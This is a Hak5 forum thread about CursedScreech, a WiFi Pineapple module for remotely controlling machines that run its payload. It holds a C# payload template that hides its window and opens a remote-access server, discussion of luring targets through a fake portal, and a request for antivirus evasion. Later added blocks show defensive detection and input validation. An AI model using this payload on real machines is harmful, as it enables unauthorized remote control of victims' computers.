sud0nick

[Official] CursedScreech

On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the following directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

Yeah, it's my fault for not checking for their existence in the first place.


I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.


@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
	public partial class Form1 : Form {

		// ***************** REMOVE THIS LINE *****************
		PA_Authorization pauth = new PA_Authorization();
		// ***************** REMOVE THIS LINE *****************

		public Form1() {
			InitializeComponent();

			CursedScreech cs = new CursedScreech();
			cs.startMulticaster("231.253.78.29", 19578);
			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
			cs.setRemoteCertificateHash("1234567890ABCDEF");
			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
		}

		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
			e.Cancel = true;
			this.Hide();
		}

		// ***************** REMOVE THIS FUNCTION *****************

		private void accessKeyButton_Click(object sender, EventArgs e) {

			// Request an access key from the Pineapple
			string key = pauth.getAccessKey();

			// Check if a key was returned
			string msg;
			if (key.Length > 0) {
				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
			}
			else {
				msg = "Failed to retrieve an access key from the server.  Please try again later.";
			}

			// Display message to the user
			MessageBox.Show(msg);
		}

		// ***************** REMOVE THIS FUNCTION *****************
	}
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

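For defenders, the startMulticaster call in the payload above is a network-visible trait. The added example below (not part of the original post or of the module) flags hosts that send repeated UDP datagrams to a multicast group outside a short list of expected ones. It assumes the payload announces itself over UDP to the configured group; the capture lines are constructed, and the threshold and function names are illustrative.

```python
import ipaddress
import re
from collections import Counter

# Multicast groups normally seen on a client LAN: mDNS, LLMNR, SSDP.
EXPECTED_GROUPS = {"224.0.0.251", "224.0.0.252", "239.255.255.250"}

# Constructed, simplified tcpdump-style lines (not a real capture).
SAMPLE_CAPTURE = """\
12:00:01.100000 IP 172.16.42.101.5353 > 224.0.0.251.5353: UDP, length 45
12:00:01.200000 IP 172.16.42.117.50312 > 231.253.78.29.19578: UDP, length 28
12:00:02.000000 IP 172.16.42.101.1900 > 239.255.255.250.1900: UDP, length 133
12:00:03.500000 IP 172.16.42.130.40000 > 239.1.2.3.5000: UDP, length 12
12:00:06.200000 IP 172.16.42.117.50312 > 231.253.78.29.19578: UDP, length 28
12:00:07.000000 IP 172.16.42.101.49152 > 172.16.42.1.53: UDP, length 33
12:00:11.200000 IP 172.16.42.117.50312 > 231.253.78.29.19578: UDP, length 28
"""

FLOW_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): UDP"
)


def unexpected_multicast(capture, expected=EXPECTED_GROUPS, min_packets=3):
    """Return sorted (src, group, port, packets) for repeated UDP to unlisted groups."""
    counts = Counter()
    for line in capture.splitlines():
        match = FLOW_RE.search(line)
        if not match:
            continue
        src, _sport, dst, dport = match.groups()
        try:
            is_mcast = ipaddress.IPv4Address(dst).is_multicast
        except ipaddress.AddressValueError:
            continue  # damaged line, e.g. an octet above 255
        if is_mcast and dst not in expected:
            counts[(src, dst, int(dport))] += 1
    return sorted(
        (src, dst, port, n)
        for (src, dst, port), n in counts.items()
        if n >= min_packets
    )


if __name__ == "__main__":
    for src, group, port, n in unexpected_multicast(SAMPLE_CAPTURE):
        print("%s sent %d datagrams to %s:%d" % (src, n, group, port))
```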

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

11 hours ago, display-names said:

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, I only have the option to set it to br-lan. I do have the most up to date version though. I will just try to reinstall the module I guess. But just in case, any ideas why I can't set my Sein interface to anything except br-lan?

EDIT 1: reinstall didn't help, too bad

Sein.png

Edited by display-names


Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

On 8/9/2018 at 2:58 AM, sud0nick said:

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Hey there, I have tried to get it to work, but no luck. Did you have any more luck? :)

On 8/10/2018 at 3:41 PM, display-names said:

Hey there, I have tried to get it to work, but no luck. Did you have any more luck? :)

Hi there,

I had the same problem. 

I studied the code (PineappleModules.cs) and found out that in "startMulticaster", in the while loop, it set the "localIP" as the wrong interface. So I had to disable the interface accordingly in the adapter settings - after all it chose the right interface.


I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

On 5/6/2019 at 11:35 AM, fan said:

I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

You want to encrypt the payload for transmission only or while it's on disk too?  If you encrypt it on disk to bypass AV you won't be able to execute it.  To run it you would need to decrypt it and at that point AV would get you anyway.  The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose.  You could possibly obfuscate your code but I don't think encryption is what you want.

Thanks for the answer, how can I use your payload to create another to bypass av. There is a video tutorial to learn how to do this.
Any information on this subject would be appreciated
 


Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight.

I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed.
Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing.

Pretty confused at this point.

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.


Hi there,

When I try to start kuro, the following entries appear in the Activity log:
[+] Starting Kuro...
[>] Cleaning up sockets

Then it ends kuro and I cannot send any commands. In PortalAuth under payload the target is visible.
I'm afraid I don't know how to fix this at the moment. Can anyone help?

Thank you.

 


Version 1.6 is now available on GitHub!  A PR has been submitted to the master repo.

Here is the changelog:

December 26, 2019

- Fixed bug in latest firmware that saved module settings in an invalid state causing issues when running Sein.

 

On 10/18/2019 at 11:00 PM, cr4nk said:

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Exact same problem that I've gotten! Is there any solution for this?


Hey everyone, I've decided that I'm not going to maintain this module any longer.  My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective.  The payloads are caught pretty easily by AV now, even Windows Defender!  I think it's time for this module to ride off into the sunset.

As for the current issues people are facing with sein.py:

socket.error: illegal IP address string passed to inet_aton

This is probably because you haven't updated the interface setting from the module yet.  You should select an interface and click the save button which will update the settings.  You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set.  You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception.

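The traceback comes from the multicast membership request that sein.py builds on line 56. The added example below (Python 3, not the module's own code) validates both settings before the socket call and names the one that is wrong. The function names are hypothetical, and the group and IP values are the ones quoted in this thread.

```python
import ipaddress
import socket


def build_mreq(mcast_group, iface_ip):
    """Return the 8-byte ip_mreq value for IP_ADD_MEMBERSHIP.

    Raises ValueError naming the bad setting instead of the bare
    "illegal IP address string passed to inet_aton" error.
    """
    parsed = {}
    for name, raw in (("multicast group", mcast_group), ("interface IP", iface_ip)):
        text = (raw or "").strip()
        try:
            # IPv4Address is stricter than inet_aton, which also accepts
            # shorthand such as "192.168.1".
            parsed[name] = ipaddress.IPv4Address(text)
        except ipaddress.AddressValueError:
            raise ValueError(
                "%s is not a dotted-quad IPv4 address: %r" % (name, raw)
            ) from None
    if not parsed["multicast group"].is_multicast:
        raise ValueError("%s is outside 224.0.0.0/4" % mcast_group)
    return parsed["multicast group"].packed + parsed["interface IP"].packed


def is_assigned_locally(iface_ip):
    """True if a UDP socket can bind to iface_ip, i.e. a local interface owns it.

    A well-formed but stale address passes build_mreq and fails here.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
            probe.bind((iface_ip, 0))
        return True
    except OSError:
        return False


# In a listener like the one in the traceback, the checked value would
# replace the two concatenated inet_aton calls:
#   sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
#                  build_mreq(MCAST_GROUP, IFACE))

if __name__ == "__main__":
    print(build_mreq("231.253.78.29", "192.168.0.138").hex())
    print(is_assigned_locally("192.168.0.138"))
```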

my Pineapple is just dead meat, seems like it's dead for a while now... seems like the product and most importantly the community is no longer there... wake up HAK5 😓

 

JMX

8 hours ago, JediMasterX said:

my Pineapple is just dead meat, seems like it's dead for a while now... seems like the product and most importantly the community is no longer there... wake up HAK5 😓

 

JMX

"Dead meat" is not a very diagnostic description.  What have you done to it? How did you attempt a reset?  Don't tell people to wake up if you can't really articulate what is going on.  Look at the reset process.  Follow it.  Make sure it is powered properly according to the documentation. Start following the process exactly.  Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process.  Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community.  

Edited by Struthian
